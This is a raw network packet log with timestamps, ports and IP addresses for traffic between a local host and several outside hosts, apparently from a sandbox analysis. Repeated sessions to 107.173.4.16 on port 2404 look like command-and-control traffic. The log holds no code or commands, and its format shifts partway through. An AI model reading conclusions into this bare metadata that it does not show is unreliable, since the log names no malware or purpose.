                                    Sep 25, 2024 16:01:29.303780079 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.304143906 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.304184914 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.304230928 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.304238081 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.304286003 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.304286003 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.390306950 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.390379906 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.390523911 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.390523911 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.390541077 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.390602112 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.391171932 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.391216040 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.391290903 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.391290903 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.391303062 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.391356945 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.393032074 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.393057108 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.393107891 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.393121958 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.393135071 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.393193960 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.393284082 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.393300056 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.393414974 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.393423080 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.393461943 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.393651962 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.393666983 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.393704891 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.393712044 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.393759012 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.393759012 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.393990040 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.394004107 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.394062042 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.394071102 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.394133091 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.394437075 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.394454002 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.394572973 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.394572973 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.394582987 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.394768953 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.394793987 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.394813061 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.394819975 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.394831896 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.394932985 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.480283976 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.480312109 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.480384111 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.480407953 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.480443954 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.480443954 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.481601954 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.481620073 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.481653929 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.481672049 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.481678009 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.481709957 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.481710911 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.481724024 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.481733084 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.481782913 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.481782913 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.481789112 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.481844902 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.481844902 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:30.295397997 CEST648602404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:30.300375938 CEST240464860107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:30.300448895 CEST648602404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:30.304138899 CEST648602404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:30.308954954 CEST240464860107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:30.786544085 CEST240464860107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:30.828582048 CEST648602404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:30.920169115 CEST240464860107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:30.924889088 CEST648602404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:30.929673910 CEST240464860107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:30.929959059 CEST648602404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:30.934715033 CEST240464860107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:31.233546972 CEST240464860107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:31.235754967 CEST648602404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:31.242490053 CEST240464860107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:31.388143063 CEST240464860107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:31.437966108 CEST648602404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:31.470668077 CEST6486180192.168.2.4178.237.33.50
                                    Sep 25, 2024 16:01:31.477715015 CEST8064861178.237.33.50192.168.2.4
                                    Sep 25, 2024 16:01:31.477893114 CEST6486180192.168.2.4178.237.33.50
                                    Sep 25, 2024 16:01:31.478108883 CEST6486180192.168.2.4178.237.33.50
                                    Sep 25, 2024 16:01:31.484940052 CEST8064861178.237.33.50192.168.2.4
                                    Sep 25, 2024 16:01:31.522612095 CEST240464860107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:31.569591045 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:31.574472904 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:31.575253010 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:31.578704119 CEST648602404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:31.609278917 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:31.614155054 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.047955990 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.079047918 CEST8064861178.237.33.50192.168.2.4
                                    Sep 25, 2024 16:01:32.079185963 CEST6486180192.168.2.4178.237.33.50
                                    Sep 25, 2024 16:01:32.094273090 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.108135939 CEST648602404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.114917994 CEST240464860107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.177285910 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.181879997 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.186708927 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.187273026 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.192239046 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.397511959 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.397545099 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.397557020 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.397586107 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.397598028 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.397612095 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.397619963 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.397655964 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.397655964 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.397681952 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.397716999 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.397731066 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.397774935 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.397793055 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.397973061 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.398334980 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.398348093 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.398600101 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.402595043 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.409022093 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.409102917 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.485241890 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.485258102 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.485271931 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.485332012 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.485346079 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.485404968 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.485404968 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.485672951 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.485686064 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.485697985 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.485709906 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.485722065 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.485728025 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.485759974 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.485786915 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.486399889 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.486469984 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.486481905 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.486495972 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.486510992 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.486560106 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.486560106 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.487288952 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.487341881 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.487354040 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.487363100 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.487397909 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.487421036 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.487428904 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.487508059 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.488214970 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.488228083 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.488240957 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.488281012 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.531913042 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.746505022 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.746524096 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.746615887 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.746941090 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.747132063 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.747176886 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.747189999 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.747190952 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.747234106 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.747246027 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.747257948 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.747272015 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.747277975 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.747334003 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.747347116 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.747354984 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.747368097 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.747400999 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.747401953 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.747401953 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.747401953 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.747416019 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.747425079 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.747428894 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.747442961 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.747454882 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.747457981 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.747468948 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.747482061 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.747499943 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.747539043 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.747551918 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.747556925 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.747556925 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.747556925 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.747580051 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.747607946 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.747622013 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.747632980 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.747644901 CEST240464862107.173.4.16192.168.2.4
Timestamp                             Source Port  Dest Port  Source IP     Dest IP
Sep 25, 2024 16:01:32.747658968 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.747672081 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.747672081 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.747730017 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.747741938 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.747762918 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.747776031 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.747786999 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.747798920 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.747812986 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.747824907 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.747839928 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.747850895 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.747855902 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.747857094 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.747858047 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.747857094 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.747857094 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.747872114 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.747884035 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.747898102 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.747922897 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.747925997 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.747946978 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.748013973 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.748013973 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.748013973 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.749037027 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.749052048 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.749064922 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.749139071 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.750927925 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.751002073 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.753340960 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.753355980 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.753376961 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.753391981 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.753488064 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.753488064 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.756381035 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.756407976 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.756484985 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.756488085 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.756499052 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.756513119 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.756531000 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.756542921 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.756555080 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.756601095 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.756602049 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.756866932 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.757050991 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.757096052 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.757107973 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.757121086 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.757152081 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.757164001 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.757186890 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.757198095 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.757200956 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.757343054 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.757343054 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.757889986 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.757940054 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.757951021 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.757997036 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.757997990 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.758012056 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.758024931 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.758037090 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.758040905 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.758090019 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.759097099 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.759109974 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.759121895 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.759135962 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.759149075 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.759152889 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.759155035 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.759162903 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.759192944 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.759252071 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.759252071 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.759915113 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.759927034 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.759939909 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.759951115 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.759963989 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.759977102 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.759989023 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.759999037 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.759999037 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.760071993 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.760915041 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.760930061 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.760951996 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.760963917 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.760977030 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.760988951 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.760994911 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.761015892 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.761045933 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.761101007 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.761149883 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.761760950 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.761852026 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.761863947 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.761874914 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.761888981 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.761909962 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.761920929 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.761926889 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.761964083 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.761964083 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.762378931 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.762420893 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.762434006 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.762442112 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.762454033 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.762465954 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.762480974 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.762492895 CEST  2404         64862      107.173.4.16  192.168.2.4
Sep 25, 2024 16:01:32.762516022 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.762531042 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.762558937 CEST  64862        2404       192.168.2.4   107.173.4.16
Sep 25, 2024 16:01:32.763154984 CEST  2404         64862      107.173.4.16  192.168.2.4
